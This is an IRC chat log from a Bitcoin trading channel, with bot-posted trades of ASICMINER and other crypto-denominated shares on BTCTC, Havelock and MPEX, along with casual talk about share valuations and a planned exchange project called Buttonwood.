12:31:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.029999 = 0.33 BTC [-] May 21 12:31:03 [BTCTC] [ASICMINER-PT] 2 @ 2.65 = 5.3 BTC [-] May 21 12:31:25 so if you want to get AM cheaply that might be a good route for you May 21 12:31:49 I sold out at 1.8ish. Never looked back :-) May 21 12:32:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.029999 = 0.06 BTC [-] May 21 12:32:18 [BTCTC] [ASICMINER-PT] 1 @ 2.659 BTC [+] May 21 12:32:22 DMC is currently 0.185 May 21 12:32:28 [BTCTC] [ASICMINER-PT] 1 @ 2.659 BTC [+] May 21 12:32:34 so 2.035 per AM May 21 12:32:35 [BTCTC] [ASICMINER-PT] 1 @ 2.66 BTC [+] May 21 12:32:43 you could instantly flip them by transferring them to a pt and selling May 21 12:33:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.029999 BTC [-] May 21 12:33:53 Sorry, even that is too risky for me. Besides, I don't have that much liquid. May 21 12:34:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.029999 BTC [-] May 21 12:34:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.029999 = 0.06 BTC [-] May 21 12:34:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.029999 BTC [-] May 21 12:34:41 [BTCTC] [ASICMINER-PT] 3 @ 2.709 = 8.127 BTC [+] May 21 12:34:51 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [+] May 21 12:35:32 [BTCTC] [ASICMINER-PT] 2 @ 2.708 = 5.416 BTC [-] May 21 12:35:53 [BTCTC] [TAT.ASICMINER] 15 @ 0.029999 = 0.45 BTC [-] May 21 12:35:54 The thing is, my analysis shows AM being a good invesment (meaning beating NASDAQ by a bit and countered for the risk weight) at 1.50 tops, maybe a bit more because I could be swayed to bet on delays from competitors. However, I wouldn't pay 1.8 for this share, and I don't do bubbles. May 21 12:36:38 https://bitcointalk.org/index.php?topic=210634.msg2220882#msg2220882 May 21 12:36:39 for the lolz. May 21 12:37:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.029999 BTC [-] May 21 12:41:59 [BTCTC] [TAT.ASICMINER] 90 @ 0.028501 = 2.5651 BTC [-] May 21 12:42:50 [BTCTC] [ASICMINER-PT] 3 @ 2.707 = 8.121 BTC [-] May 21 12:44:09 [BTCTC] [PAJKA.BOND] 1 @ 0.108989 BTC [+] May 21 12:44:47 [BTCTC] [ASICMINER-PT] 1 @ 2.708 BTC [+] May 21 12:45:00 [BTCTC] [PAJKA.BOND] 10 @ 0.108989 = 1.0899 BTC [+] May 21 12:45:42 [BTCTC] [ASICMINER-PT] 2 @ 2.707 = 5.414 BTC [-] May 21 12:45:43 [BTCTC] [ASICMINER-PT] 4 @ 2.707 = 10.828 BTC [-] May 21 12:47:44 [BTCTC] [BASIC-MINING] 1 @ 0.509999 BTC [-] May 21 12:47:46 [BTCTC] [BASIC-MINING] 4 @ 0.51 = 2.04 BTC [+] May 21 12:49:49 [BTCTC] [TAT.ASICMINER] 56 @ 0.03299 = 1.8474 BTC [+] May 21 12:50:32 [BTCTC] [BASIC-MINING] 6 @ 0.52 = 3.12 BTC [+] May 21 12:52:02 [HAVELOCK] [ASICM] 60 @ 0.0288 = 1.728 BTC [+] May 21 12:52:04 [BTCTC] [ASICMINER-PT] 5 @ 2.706 = 13.53 BTC [-] May 21 12:52:09 [BTCTC] [ASICMINER-PT] 26 @ 2.707 = 70.382 BTC [+] May 21 12:55:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.03 = 0.24 BTC [-] May 21 13:02:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.028551 = 0.571 BTC [-] May 21 13:03:18 [BTCTC] [TAT.ASICMINER] 11 @ 0.02855 = 0.3141 BTC [-] May 21 13:08:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02855 = 0.1142 BTC [-] May 21 13:08:04 [BTCTC] [ASICMINER-PT] 1 @ 2.707 BTC [+] May 21 13:08:13 [BTCTC] [TAT.ASICMINER] 35 @ 0.02851 = 0.9979 BTC [-] May 21 13:08:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.0285 = 0.285 BTC [-] May 21 13:09:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.0282 = 0.1692 BTC [-] May 21 13:10:03 [HAVELOCK] [ASICM] 300 @ 0.02820001 = 8.46 BTC [-] May 21 13:10:04 [HAVELOCK] [ASICM] 20 @ 0.0282 = 0.564 BTC [-] May 21 13:10:05 [HAVELOCK] [ASICM] 132 @ 0.0282 = 3.7224 BTC [-] May 21 13:10:07 [HAVELOCK] [ASICM] 1 @ 0.02819 BTC [-] May 21 13:10:08 [HAVELOCK] [ASICM] 347 @ 0.0276 = 9.5772 BTC [-] May 21 13:10:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.028 = 0.42 BTC [-] May 21 13:12:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.028 = 0.42 BTC [-] May 21 13:13:05 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] May 21 13:15:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [+] May 21 13:17:13 [BTCTC] [TAT.ASICMINER] 12 @ 0.027 = 0.324 BTC [-] May 21 13:20:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.026799 = 0.1072 BTC [-] May 21 13:22:03 [HAVELOCK] [ASICM] 106 @ 0.0277 = 2.9362 BTC [+] May 21 13:22:03 [HAVELOCK] [ASICM] 153 @ 0.0276 = 4.2228 BTC [-] May 21 13:26:49 hi all May 21 13:27:17 [BTCTC] [ASICMINER-PT] 1 @ 2.686999 BTC [-] May 21 13:28:01 [HAVELOCK] [ASICM] 13 @ 0.0277 = 0.3601 BTC [+] May 21 13:28:06 [BTCTC] [TAT.ASICMINER] 37 @ 0.0265 = 0.9805 BTC [-] May 21 13:29:33 [BTCTC] [B.YABMC] 45 @ 0.0135 = 0.6075 BTC [-] May 21 13:31:02 [BTCTC] [ASICMINER-PT] 1 @ 2.590001 BTC [-] May 21 13:32:41 [BTCTC] [BITVPS] 1 @ 0.000651 BTC [+] May 21 13:32:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.026249 = 0.42 BTC [-] May 21 13:34:02 [HAVELOCK] [ASICM] 13 @ 0.0269 = 0.3497 BTC [-] May 21 13:34:55 [BTCTC] [TAT.ASICMINER] 74 @ 0.02625 = 1.9425 BTC [+] May 21 13:35:02 [HAVELOCK] [ASICM] 487 @ 0.0269 = 13.1003 BTC [-] May 21 13:35:39 [BTCTC] [S.DICE-PT] 2 @ 0.005 = 0.01 BTC [+] May 21 13:35:58 [BTCTC] [TAT.ASICMINER] 47 @ 0.02625 = 1.2338 BTC [+] May 21 13:36:13 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [-] May 21 13:37:00 [BTCTC] [ASICMINER-PT] 1 @ 2.590001 BTC [-] May 21 13:40:01 [HAVELOCK] [ASICM] 13 @ 0.0269 = 0.3497 BTC [-] May 21 13:40:47 [BTCTC] [ASICMINER-PT] 1 @ 2.685999 BTC [+] May 21 13:41:12 [BTCTC] [TAT.ASICMINER] 74 @ 0.02625 = 1.9425 BTC [+] May 21 13:42:33 mjr_: hello! May 21 13:42:40 [BTCTC] [ASICMINER-PT] 1 @ 2.685999 BTC [+] May 21 13:43:06 [BTCTC] [ASICMINER-PT] 1 @ 2.686 BTC [+] May 21 13:44:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.02625 = 0.0525 BTC [+] May 21 13:44:57 [BTCTC] [ASICMINER-PT] 1 @ 2.686 BTC [+] May 21 13:45:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.02625 = 0.315 BTC [+] May 21 13:45:42 [BTCTC] [ASICMINER-PT] 2 @ 2.686 = 5.372 BTC [+] May 21 13:46:02 [HAVELOCK] [HIM] 1 @ 1.9 BTC [+] May 21 13:46:44 whats up May 21 13:46:55 the conference was pretty fun May 21 13:47:31 glad to hear it May 21 13:47:48 lot of interest in buttonwood May 21 13:48:01 [HAVELOCK] [ASICM] 100 @ 0.0268 = 2.68 BTC [-] May 21 13:48:04 the guys in berlin want to start a similar exchange May 21 13:48:09 also one in sydney i think May 21 13:48:42 I saw that canada is turning bitcoin friendly May 21 13:48:58 yeah i saw that too May 21 13:49:00 very nice May 21 13:49:28 mjr_: some folks want to do the same in paris, talked about your project too, you probably don't read the french sub fora though :-) May 21 13:49:43 ah May 21 13:49:50 lol, i wouldn't understand May 21 13:50:17 well, we have user accounts working on a test version May 21 13:50:25 i am going to be merging the github soon May 21 13:51:03 hope to have geolocation done by next week May 21 13:51:22 [BTCTC] [TAT.ASICMINER] 76 @ 0.02625 = 1.995 BTC [+] May 21 13:52:01 [HAVELOCK] [ASICM] 22 @ 0.0268 = 0.5896 BTC [-] May 21 13:53:02 [HAVELOCK] [ASICM] 285 @ 0.0261 = 7.4385 BTC [-] May 21 13:53:32 mjr_: so you're saying your code can handle different venues May 21 13:53:44 without mixing order books ? May 21 13:54:02 [HAVELOCK] [ASICM] 10 @ 0.026 = 0.26 BTC [-] May 21 13:54:03 [HAVELOCK] [ASICM] 275 @ 0.02625 = 7.2188 BTC [+] May 21 13:54:12 well... May 21 13:54:18 there are two ways of handling that May 21 13:54:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.02625 = 2.625 BTC [+] May 21 13:54:25 i can either filter using geolocation May 21 13:54:36 just make different instances May 21 13:54:38 or i can aggregate order books from separate mongo collections May 21 13:54:39 yes May 21 13:54:51 you'll save yourself headaches May 21 13:54:54 keep it simple May 21 13:54:55 for performance i would say that the second way would be better May 21 13:54:56 yes May 21 13:55:13 there is no interest in keeping everything in the same location May 21 13:55:13 an angel investor is interested too May 21 13:55:17 well... May 21 13:55:24 it would be nice to see all orders from everywhere May 21 13:55:30 from an information perspective May 21 13:55:34 also you can charge fees for each venue you add and have a white-branding business model May 21 13:55:42 i may May 21 13:55:42 ;;tslb May 21 13:55:46 Time since last block: 1 hour, 49 minutes, and 59 seconds May 21 13:55:50 :/ May 21 13:55:52 but i was thinking of doing more of a service provider model May 21 13:55:59 yeah, but i wouldn't try to build it in, i'd make a separate app May 21 13:56:29 it should be easy to build it in May 21 13:56:34 meteor has something for that May 21 13:56:48 i can connect separate meteor instances so that they publish to one location May 21 13:57:02 [HAVELOCK] [ASICM] 5 @ 0.02625 = 0.1313 BTC [+] May 21 13:57:03 [HAVELOCK] [ASICM] 5 @ 0.02625 = 0.1313 BTC [+] May 21 13:57:05 [HAVELOCK] [ASICM] 5 @ 0.02625 = 0.1313 BTC [+] May 21 13:57:08 [BTCTC] [ASICMINER-PT] 1 @ 2.610001 BTC [-] May 21 13:57:13 [BTCTC] [ASICMINER-PT] 2 @ 2.61 = 5.22 BTC [-] May 21 13:57:15 geolocation and user profile features are the next things to come May 21 13:57:18 [BTCTC] [ASICMINER-PT] 1 @ 2.600003 BTC [-] May 21 13:57:22 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [-] May 21 13:57:23 then I think I will work on API access May 21 13:58:02 [HAVELOCK] [ASICM] 45 @ 0.02625 = 1.1813 BTC [+] May 21 13:58:49 [BTCTC] [ASICMINER-PT] 1 @ 2.629 BTC [+] May 21 13:58:55 [BTCTC] [ASICMINER-PT] 1 @ 2.594001 BTC [-] May 21 13:58:59 [BTCTC] [ASICMINER-PT] 1 @ 2.59392 BTC [-] May 21 13:59:29 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] May 21 13:59:31 [BTCTC] [ASICMINER-PT] 1 @ 2.590001 BTC [+] May 21 13:59:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.02625 = 0.105 BTC [+] May 21 14:00:48 [MPEX] [S.MPOE] 12050 @ 0.00066158 = 7.972 BTC [-] May 21 14:01:41 [BTCTC] [B.YABMC] 1 @ 0.0142 BTC [+] May 21 14:03:02 [HAVELOCK] [ASICM] 60 @ 0.0268 = 1.608 BTC [+] May 21 14:06:02 [HAVELOCK] [ASICM] 250 @ 0.0266 = 6.65 BTC [-] May 21 14:06:02 [HAVELOCK] [ASICM] 3 @ 0.0266 = 0.0798 BTC [-] May 21 14:06:35 anyways, we should have a bunch of new features soon, and be rolling out in a bunch of new locations May 21 14:08:46 [BTCTC] [ASICMINER-PT] 1 @ 2.609 BTC [+] May 21 14:09:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.02592 = 0.1037 BTC [-] May 21 14:09:57 [BTCTC] [ASICMINER-PT] 31 @ 2.59091 = 80.3182 BTC [-] May 21 14:10:02 [BTCTC] [ASICMINER-PT] 94 @ 2.59 = 243.46 BTC [-] May 21 14:10:22 [BTCTC] [ASICMINER-PT] 2 @ 2.61 = 5.22 BTC [+] May 21 14:10:25 [BTCTC] [ASICMINER-PT] 1 @ 2.688999 BTC [+] May 21 14:10:28 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] May 21 14:10:30 [BTCTC] [ASICMINER-PT] 1 @ 2.689999 BTC [+] May 21 14:10:36 damn yo May 21 14:10:37 wtf May 21 14:10:41 asicminer is blowing up May 21 14:10:46 for realz May 21 14:10:54 almost $300?? May 21 14:11:16 heh May 21 14:11:21 dont think of the dollar value May 21 14:11:46 well...i'm thinking they may need to do a split soon May 21 14:11:49 people are pricing it in increments of btc because they're banking on sweet divs this time around May 21 14:12:04 split? no need there are already PT that split May 21 14:12:12 ah ok May 21 14:12:21 e.g. ThickAsThieves's sneaky venture May 21 14:12:25 hehehe May 21 14:12:34 mad props on that TAT, wish i'd thought of it May 21 14:12:41 hahaha May 21 14:12:48 btw, deadweasel said they are talking about project buttonwood on btcpro too May 21 14:13:05 talltim? May 21 14:13:26 so what's up with the netork May 21 14:13:31 ;;tslb May 21 14:13:34 Time since last block: 2 hours, 7 minutes, and 47 seconds May 21 14:14:10 ThickAsThieves: looks like the miners read furuknap's dissertation May 21 14:14:33 and died? May 21 14:14:39 lmfao May 21 14:14:49 http://dealbook.nytimes.com/2013/05/06/a-push-for-a-bitcoin-buttonwood/ May 21 14:15:09 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [+] May 21 14:15:13 "said Mr. Rossi, who wore jeans and loafers for the occasion, and smoked a cigarette while watching the proceedings" May 21 14:15:38 [MPEX] [S.MPOE] 14312 @ 0.00066691 = 9.5448 BTC [+] May 21 14:15:39 or is it just blockchain.into data messed up again May 21 14:15:40 [MPEX] [S.MPOE] 712 @ 0.00066794 = 0.4756 BTC [+] May 21 14:15:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.025402 = 0.508 BTC [-] May 21 14:16:28 http://blockexplorer.com/block/00000000000000dd63768aea544082f289ed2318aa8e734870c1fbe4decfcc7a May 21 14:16:40 waaaay behind May 21 14:17:13 word May 21 14:18:33 [BTCTC] [TAT.ASICMINER] 22 @ 0.02523 = 0.5551 BTC [-] May 21 14:19:24 [BTCTC] [ASICMINER-PT] 1 @ 2.686 BTC [-] May 21 14:20:44 god i am so tempted to just sell AM right now May 21 14:20:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.02595 = 0.0519 BTC [+] May 21 14:21:02 [HAVELOCK] [ASICM] 30 @ 0.0258 = 0.774 BTC [-] May 21 14:21:04 [HAVELOCK] [ASICM] 1844 @ 0.0258 = 47.5752 BTC [-] May 21 14:21:05 potential divs just pale in comparison to the price delta May 21 14:22:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02595 BTC [+] May 21 14:24:36 most stocks aren't valued my their divs May 21 14:24:40 by* May 21 14:28:02 [HAVELOCK] [ASICM] 200 @ 0.0263 = 5.26 BTC [+] May 21 14:29:02 [HAVELOCK] [ASICM] 550 @ 0.02625 = 14.4375 BTC [-] May 21 14:29:21 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] May 21 14:29:27 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] May 21 14:29:32 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] May 21 14:29:36 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] May 21 14:29:59 [BTCTC] [ASICMINER-PT] 1 @ 2.678 BTC [+] May 21 14:30:01 [HAVELOCK] [ASICM] 30 @ 0.0263 = 0.789 BTC [+] May 21 14:30:04 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] May 21 14:30:24 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] May 21 14:30:33 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] May 21 14:30:42 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [-] May 21 14:30:49 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 14:30:55 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] May 21 14:31:14 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 14:31:34 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 14:32:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.0255 = 0.204 BTC [-] May 21 14:32:51 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [-] May 21 14:32:54 [BTCTC] [TAT.ASICMINER] 28 @ 0.02523 = 0.7064 BTC [-] May 21 14:33:01 [HAVELOCK] [ASICM] 169 @ 0.026275 = 4.4405 BTC [-] May 21 14:33:11 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 21 14:33:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.02521 = 0.2521 BTC [-] May 21 14:33:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.02521 = 0.4538 BTC [-] May 21 14:33:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.025203 = 0.1764 BTC [-] May 21 14:33:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.0252 = 0.2268 BTC [-] May 21 14:34:43 [BTCTC] [ASICMINER-PT] 1 @ 2.677 BTC [+] May 21 14:35:36 [BTCTC] [BITVPS] 5 @ 0.000651 = 0.0033 BTC [+] May 21 14:35:38 [BTCTC] [ASICMINER-PT] 6 @ 2.6 = 15.6 BTC [-] May 21 14:37:20 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [+] May 21 14:37:34 [BTCTC] [BITVPS] 25 @ 0.000697 = 0.0174 BTC [+] May 21 14:39:49 [BTCTC] [BITVPS] 30 @ 0.000697 = 0.0209 BTC [+] May 21 14:39:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.025949 = 0.519 BTC [+] May 21 14:40:34 [BTCTC] [TAT.ASICMINER] 72 @ 0.025949 = 1.8683 BTC [+] May 21 14:41:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.02592 = 0.1037 BTC [-] May 21 14:42:02 [HAVELOCK] [ASICM] 12 @ 0.026275 = 0.3153 BTC [-] May 21 14:42:44 [BTCTC] [S.DICE-PT] 29 @ 0.00264 = 0.0766 BTC [+] May 21 14:43:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.02592 = 0.1555 BTC [-] May 21 14:44:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02592 = 0.0778 BTC [-] May 21 14:46:02 [BTCTC] [ASICMINER-PT] 1 @ 2.671999 BTC [+] May 21 14:47:18 [BTCTC] [TAT.ASICMINER] 31 @ 0.02592 = 0.8035 BTC [-] May 21 14:48:02 [HAVELOCK] [ASICM] 3 @ 0.0262 = 0.0786 BTC [-] May 21 14:51:02 [HAVELOCK] [ASICM] 200 @ 0.02581001 = 5.162 BTC [-] May 21 14:51:03 [HAVELOCK] [ASICM] 50 @ 0.02581 = 1.2905 BTC [-] May 21 14:51:04 [HAVELOCK] [ASICM] 30 @ 0.0258 = 0.774 BTC [-] May 21 14:53:02 [HAVELOCK] [HIM] 5 @ 2.0479 = 10.2395 BTC [+] May 21 14:58:50 I do feel like I'm pouring gasoline on the flames, but... http://coin.furuknap.net/where-to-buy-bitcoin-and-litecoin-shares/ May 21 14:59:27 [BTCTC] [PAJKA.BOND] 250 @ 0.108989 = 27.2473 BTC [+] May 21 15:00:18 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [-] May 21 15:02:27 [BTCTC] [ASICMINER-PT] 11 @ 2.608999 = 28.699 BTC [+] May 21 15:05:01 [HAVELOCK] [ASICM] 5 @ 0.0261 = 0.1305 BTC [+] May 21 15:09:51 [BTCTC] [ASICMINER-PT] 1 @ 2.501001 BTC [-] May 21 15:09:56 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] May 21 15:10:02 [HAVELOCK] [ASICM] 12 @ 0.02551001 = 0.3061 BTC [-] May 21 15:10:04 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [-] May 21 15:10:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.025001 = 0.5 BTC [-] May 21 15:11:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] May 21 15:11:35 [BTCTC] [TAT.ASICMINER] 23 @ 0.025 = 0.575 BTC [-] May 21 15:11:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] May 21 15:11:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.023201 = 0.464 BTC [-] May 21 15:12:01 [BTCTC] [TAT.ASICMINER] 13 @ 0.0232 = 0.3016 BTC [-] May 21 15:12:03 [HAVELOCK] [ASICM] 10 @ 0.02551001 = 0.2551 BTC [-] May 21 15:13:23 [MPEX] [S.MPOE] 6700 @ 0.00066158 = 4.4326 BTC [-] May 21 15:16:01 [HAVELOCK] [ASICM] 1 @ 0.0255 BTC [-] May 21 15:17:01 [HAVELOCK] [ASICM] 11 @ 0.02551001 = 0.2806 BTC [+] May 21 15:17:28 < mircea_popescu> https://bitcointalk.org/index.php?topic=210634.msg2220882#msg2220882 May 21 15:18:01 lolz were had,thanks MP May 21 15:19:25 lol "You're the guy who wasn't good enough to sling dope." May 21 15:19:38 [BTCTC] [BITVPS] 799 @ 0.00065 = 0.5194 BTC [-] May 21 15:20:27 [BTCTC] [ASICMINER-PT] 1 @ 2.598999 BTC [+] May 21 15:21:02 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] May 21 15:22:02 [HAVELOCK] [ASICM] 10 @ 0.026 = 0.26 BTC [+] May 21 15:22:12 misterbigg has a bigg ego and a lot of aggressive nonsense as his modus operandi. lame. May 21 15:22:43 the forum is sticky, disgusting place. May 21 15:22:52 i don't know why I keep going back. May 21 15:24:18 [BTCTC] [S.DICE-PT] 142 @ 0.00264 = 0.3749 BTC [+] May 21 15:25:09 does johnthedong have an IRC presence? May 21 15:25:15 JohnK May 21 15:26:25 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] May 21 15:28:02 [HAVELOCK] [ASICM] 13 @ 0.026 = 0.338 BTC [+] May 21 15:28:28 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] May 21 15:28:32 [BTCTC] [ASICMINER-PT] 1 @ 2.647996 BTC [+] May 21 15:28:36 [BTCTC] [ASICMINER-PT] 1 @ 2.647997 BTC [+] May 21 15:30:01 [HAVELOCK] [ASICM] 10 @ 0.0259 = 0.259 BTC [-] May 21 15:30:51 [BTCTC] [ASICMINER-PT] 1 @ 2.648 BTC [+] May 21 15:31:04 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] May 21 15:31:54 deadweasel: hi, how do you get an invite for btcpro? May 21 15:35:38 [BTCTC] [ASICMINER-PT] 2 @ 2.649 = 5.298 BTC [+] May 21 15:35:40 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [+] May 21 15:35:42 [BTCTC] [ASICMINER-PT] 2 @ 2.658 = 5.316 BTC [+] May 21 15:37:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.025919 = 0.1814 BTC [+] May 21 15:38:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.025919 = 0.2851 BTC [+] May 21 15:39:54 [BTCTC] [S.DICE-PT] 8 @ 0.00274 = 0.0219 BTC [+] May 21 15:41:19 beg borrow and steal, but it's totally dead in there since the price flattened out. May 21 15:41:35 MPOE is gonna have record divs this month May 21 15:42:50 [BTCTC] [ASICMINER-PT] 1 @ 2.508009 BTC [-] May 21 15:42:54 [BTCTC] [ASICMINER-PT] 1 @ 2.508008 BTC [-] May 21 15:42:59 [BTCTC] [ASICMINER-PT] 1 @ 2.508002 BTC [-] May 21 15:43:04 [BTCTC] [ASICMINER-PT] 1 @ 2.508 BTC [-] May 21 15:45:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.025001 = 0.05 BTC [-] May 21 15:45:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] May 21 15:45:20 [BTCTC] [TAT.ASICMINER] 139 @ 0.025 = 3.475 BTC [-] May 21 15:45:45 furuknap, maybe coinbr deserves a mention? May 21 15:47:56 [BTCTC] [ASICMINER-PT] 1 @ 2.657994 BTC [+] May 21 15:48:01 [HAVELOCK] [ASICM] 1 @ 0.0259 BTC [-] May 21 15:48:04 [BTCTC] [ASICMINER-PT] 1 @ 2.657996 BTC [+] May 21 15:49:34 [MPEX] [S.MPOE] 1336 @ 0.00066158 = 0.8839 BTC [-] May 21 15:49:36 [MPEX] [S.MPOE] 6914 @ 0.00065841 = 4.5522 BTC [-] May 21 15:49:39 [BTCTC] [ASICMINER-PT] 3 @ 2.657997 = 7.974 BTC [+] May 21 15:51:51 [BTCTC] [ASICMINER-PT] 3 @ 2.657997 = 7.974 BTC [+] May 21 15:53:23 lol May 21 15:54:02 [HAVELOCK] [ASICM] 10 @ 0.0259 = 0.259 BTC [-] May 21 15:55:50 [BTCTC] [ASICMINER-PT] 1 @ 2.6555 BTC [-] May 21 15:56:14 [HAVELOCK] [SDICE] 4 @ 0.24 = 0.96 BTC [+] May 21 15:56:16 [HAVELOCK] [SDICE] 36 @ 0.2399 = 8.6364 BTC [-] May 21 15:57:00 [BTCTC] [ASICMINER-PT] 1 @ 2.6555 BTC [-] May 21 15:57:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.025919 = 0.0518 BTC [+] May 21 15:57:16 [BTCTC] [TAT.ASICMINER] 63 @ 0.02592 = 1.633 BTC [+] May 21 15:57:53 [BTCTC] [ASICMINER-PT] 1 @ 2.6555 BTC [-] May 21 15:59:38 [BTCTC] [ASICMINER-PT] 2 @ 2.6555 = 5.311 BTC [-] May 21 16:03:02 [HAVELOCK] [SDICE] 4 @ 0.2399 = 0.9596 BTC [-] May 21 16:03:29 [BTCTC] [ASICMINER-PT] 1 @ 2.550002 BTC [-] May 21 16:12:00 [BTCTC] [S.DICE-PT] 285 @ 0.00274 = 0.7809 BTC [+] May 21 16:12:03 [BTCTC] [S.DICE-PT] 127 @ 0.00275 = 0.3493 BTC [+] May 21 16:12:05 [BTCTC] [S.DICE-PT] 1403 @ 0.0028 = 3.9284 BTC [+] May 21 16:14:42 [BTCTC] [ASICMINER-PT] 1 @ 2.628996 BTC [+] May 21 16:16:05 [BTCTC] [S.DICE-PT] 4 @ 0.0028 = 0.0112 BTC [+] May 21 16:16:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.025919 = 0.0518 BTC [-] May 21 16:16:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.02592 = 0.311 BTC [+] May 21 16:17:02 [BTCTC] [BTC-BOND] 129 @ 0.010096 = 1.3024 BTC [+] May 21 16:23:02 [HAVELOCK] [ASICM] 1 @ 0.0258 BTC [-] May 21 16:24:12 [BTCTC] [TAT.ASICMINER] 15 @ 0.0259 = 0.3885 BTC [-] May 21 16:25:08 [BTCTC] [ASICMINER-PT] 1 @ 2.555001 BTC [-] May 21 16:27:01 [HAVELOCK] [ASICM] 54 @ 0.0258 = 1.3932 BTC [-] May 21 16:27:03 [HAVELOCK] [ASICM] 196 @ 0.0258 = 5.0568 BTC [-] May 21 16:28:55 [BTCTC] [TAT.ASICMINER] 31 @ 0.0259 = 0.8029 BTC [-] May 21 16:28:57 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [-] May 21 16:29:12 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [-] May 21 16:29:40 [BTCTC] [S.DICE-PT] 3 @ 0.0028 = 0.0084 BTC [+] May 21 16:30:23 [BTCTC] [ASICMINER-PT] 1 @ 2.598999 BTC [+] May 21 16:30:26 [BTCTC] [TAT.ASICMINER] 192 @ 0.02592 = 4.9766 BTC [+] May 21 16:31:15 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [-] May 21 16:32:15 well off to get drunk , peace all May 21 16:32:55 [BTCTC] [TAT.ASICMINER] 40 @ 0.02592 = 1.0368 BTC [+] May 21 16:33:32 [BTCTC] [TAT.ASICMINER] 33 @ 0.0259 = 0.8547 BTC [-] May 21 16:34:02 [HAVELOCK] [ASICM] 35 @ 0.0258 = 0.903 BTC [-] May 21 16:34:03 [HAVELOCK] [ASICM] 365 @ 0.0259 = 9.4535 BTC [+] May 21 16:35:02 [HAVELOCK] [ASICM] 194 @ 0.0259 = 5.0246 BTC [+] May 21 16:35:08 [BTCTC] [ASICMINER-PT] 12 @ 2.54 = 30.48 BTC [-] May 21 16:36:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02592 BTC [+] May 21 16:36:04 [BTCTC] [ASICMINER-PT] 4 @ 2.539 = 10.156 BTC [-] May 21 16:36:37 [BTCTC] [ASICMINER-PT] 3 @ 2.54 = 7.62 BTC [+] May 21 16:38:12 [BTCTC] [ASICMINER-PT] 5 @ 2.549 = 12.745 BTC [+] May 21 16:39:43 sold those passthrough shares way too soon May 21 16:39:47 burp May 21 16:40:09 [BTCTC] [TAT.ASICMINER] 15 @ 0.02592 